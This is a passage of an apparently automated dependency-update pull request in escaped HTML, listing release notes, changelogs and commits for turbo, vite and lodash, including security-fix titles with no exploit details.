2.9.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/turborepo/releases\"\u003eturbo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eTurborepo v2.9.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains important security fixes.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eHigh:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-5xc8-49mv-x4mm\"\u003eGHSA-5xc8-49mv-x4mm: Turborepo VSCode Extension command injection\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLow:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-hcf7-66rw-9f5r\"\u003eGHSA-hcf7-66rw-9f5r: Login callback CSRF/session fixation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-3qcw-2rhx-2726\"\u003eGHSA-3qcw-2rhx-2726: Unexpected local code execution during Yarn Berry detection\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eChangelog\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erelease(turborepo): 2.9.12 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12774\"\u003evercel/turborepo#12774\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Restore docs mobile menu by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12782\"\u003evercel/turborepo#12782\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12787\"\u003evercel/turborepo#12787\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Scope GitHub Actions caches by branch by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12788\"\u003evercel/turborepo#12788\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: Validate lockfiles without dependency downloads by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12789\"\u003evercel/turborepo#12789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved unneeded import form hash creation script in docs by \u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Validate auth callback state by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12802\"\u003evercel/turborepo#12802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Harden VS Code extension command execution by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12800\"\u003evercel/turborepo#12800\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Avoid project-local Yarn during detection by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12801\"\u003evercel/turborepo#12801\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Release 2.9.13 by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12803\"\u003evercel/turborepo#12803\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/vercel/turborepo/compare/v2.9.12...v2.9.14\"\u003ehttps://github.com/vercel/turborepo/compare/v2.9.12...v2.9.14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eTurborepo v2.9.13-canary.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eChangelog\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erelease(turborepo): 2.9.11-canary.7 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12768\"\u003evercel/turborepo#12768\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Allow \u003ccode\u003e$TURBO_EXTENDS$\u003c/code\u003e in LSP diagnostics by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12770\"\u003evercel/turborepo#12770\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease(turborepo): 2.9.11 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12771\"\u003evercel/turborepo#12771\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Allow transit nodes in LSP diagnostics by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12773\"\u003evercel/turborepo#12773\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease(turborepo): 2.9.12 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12774\"\u003evercel/turborepo#12774\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Restore docs mobile menu by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12782\"\u003evercel/turborepo#12782\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12787\"\u003evercel/turborepo#12787\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Scope GitHub Actions caches by branch by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12788\"\u003evercel/turborepo#12788\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: Validate lockfiles without dependency downloads by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12789\"\u003evercel/turborepo#12789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved unneeded import form hash creation script in docs by \u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Validate auth callback state by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12802\"\u003evercel/turborepo#12802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Harden VS Code extension command execution by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12800\"\u003evercel/turborepo#12800\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Avoid project-local Yarn during detection by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12801\"\u003evercel/turborepo#12801\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/fc62fe0d9c347d1d24f0ed8946284856593ddb93\"\u003e\u003ccode\u003efc62fe0\u003c/code\u003e\u003c/a\u003e publish 2.9.14 to registry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/fb8c9aec0f9e83f95783659a5ce9c4478cf62cb9\"\u003e\u003ccode\u003efb8c9ae\u003c/code\u003e\u003c/a\u003e chore: Release 2.9.13 (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12803\"\u003e#12803\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/e8e629da4e1fb75231089e91b19be9d327a3e649\"\u003e\u003ccode\u003ee8e629d\u003c/code\u003e\u003c/a\u003e fix: Avoid project-local Yarn during detection (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12801\"\u003e#12801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/91c90cbf12f524c5c29b713d6472dd5fcdecb309\"\u003e\u003ccode\u003e91c90cb\u003c/code\u003e\u003c/a\u003e fix: Harden VS Code extension command execution (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12800\"\u003e#12800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/84f450894e87da1eed864d51f6f637f26980d560\"\u003e\u003ccode\u003e84f4508\u003c/code\u003e\u003c/a\u003e fix: Validate auth callback state (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12802\"\u003e#12802\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/1779ad7901384f106236a6e196059e4929745514\"\u003e\u003ccode\u003e1779ad7\u003c/code\u003e\u003c/a\u003e Removed unneeded import form hash creation script in docs (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12799\"\u003e#12799\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/71f8c90a807ffb9b9876ea8a04f523f473bf5c8d\"\u003e\u003ccode\u003e71f8c90\u003c/code\u003e\u003c/a\u003e test: Validate lockfiles without dependency downloads (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12789\"\u003e#12789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/5fcb96024d503127bb0ed760ebe159b7716c52b3\"\u003e\u003ccode\u003e5fcb960\u003c/code\u003e\u003c/a\u003e ci: Scope GitHub Actions caches by branch (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12788\"\u003e#12788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/4cf9fabc9a6f6c99fe4e2f2da9f35be631be062a\"\u003e\u003ccode\u003e4cf9fab\u003c/code\u003e\u003c/a\u003e ci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12787\"\u003e#12787\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/859c629bc401f239ac7980a132746ca90478e17c\"\u003e\u003ccode\u003e859c629\u003c/code\u003e\u003c/a\u003e fix: Restore docs mobile menu (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12782\"\u003e#12782\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/turborepo/compare/v2.5.2...v2.9.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for turbo since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 6.3.4 to 6.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.4.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.4.1\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.1/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.4.0\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.0/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.3.7\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.3.7/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.3.6\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.3.6/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.4.2 (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22163\"\u003e#22163\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/fe28e47e9463e4c9619f94bfa06d2f8f1411b44b\"\u003efe28e47\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22163\"\u003e#22163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/ca4da5d1fb45c9cfdce606aa30825095791b164b\"\u003eca4da5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.4.1 (2025-10-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20969\"\u003e#20969\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/1114b5d7ea03e26572708715343bec69db4536e8\"\u003e1114b5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20968\"\u003e#20968\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20969\"\u003e#20969\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.4.0 (2025-10-15)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: allow passing down resolved config to vite's createServer (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20932\"\u003e#20932\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/ca6455ee9eb6111a9caa9810506a1b9ac96a520a\"\u003eca6455e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20932\"\u003e#20932\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.7 (2025-10-14)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(esbuild): inject esbuild helpers correctly for esbuild 0.25.9+ (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20940\"\u003e#20940\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/c59a222aa584c087cfe710173de1b9ecb597a3ff\"\u003ec59a222\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20940\"\u003e#20940\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.6 (2025-09-08)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f\"\u003e0ab19ea\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20736\"\u003e#20736\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: upgrade sirv to 3.0.2 (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20735\"\u003e#20735\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0\"\u003ee11d240\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20735\"\u003e#20735\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: detect ts support via \u003ccode\u003eprocess.features\u003c/code\u003e (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20544\"\u003e#20544\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7d9922972b62329d37a71d4da5a4a382d0bf8a79\"\u003e7d99229\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20544\"\u003e#20544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.5 (2025-05-05)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(ssr): handle uninitialized export access as undefined (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19959\"\u003e#19959\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/fd38d076fe2455aac1e00a7b15cd51159bf12bb5\"\u003efd38d07\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19959\"\u003e#19959\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/6b3fad02abd550bd7b79934ff92c58dbd7f33045\"\u003e\u003ccode\u003e6b3fad0\u003c/code\u003e\u003c/a\u003e release: v6.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca4da5d1fb45c9cfdce606aa30825095791b164b\"\u003e\u003ccode\u003eca4da5d\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/fe28e47e9463e4c9619f94bfa06d2f8f1411b44b\"\u003e\u003ccode\u003efe28e47\u003c/code\u003e\u003c/a\u003e fix: apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22163\"\u003e#22163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/5487f4f641f70c47ea05fd101a4319897df048b3\"\u003e\u003ccode\u003e5487f4f\u003c/code\u003e\u003c/a\u003e release: v6.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/1114b5d7ea03e26572708715343bec69db4536e8\"\u003e\u003ccode\u003e1114b5d\u003c/code\u003e\u003c/a\u003e fix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20969\"\u003e#20969\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f12697c0f64b9a37196b9ab218a0911829d5b103\"\u003e\u003ccode\u003ef12697c\u003c/code\u003e\u003c/a\u003e release: v6.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca6455ee9eb6111a9caa9810506a1b9ac96a520a\"\u003e\u003ccode\u003eca6455e\u003c/code\u003e\u003c/a\u003e feat: allow passing down resolved config to vite's createServer (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20932\"\u003e#20932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0e173d83681daa31be10fa8a62d56b1ec84690af\"\u003e\u003ccode\u003e0e173d8\u003c/code\u003e\u003c/a\u003e release: v6.3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/c59a222aa584c087cfe710173de1b9ecb597a3ff\"\u003e\u003ccode\u003ec59a222\u003c/code\u003e\u003c/a\u003e fix(esbuild): inject esbuild helpers correctly for esbuild 0.25.9+ (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20940\"\u003e#20940\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/3f337c5e24504e51188d29c970de1416ee523dbb\"\u003e\u003ccode\u003e3f337c5\u003c/code\u003e\u003c/a\u003e release: v6.3.6\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v6.4.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for vite since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 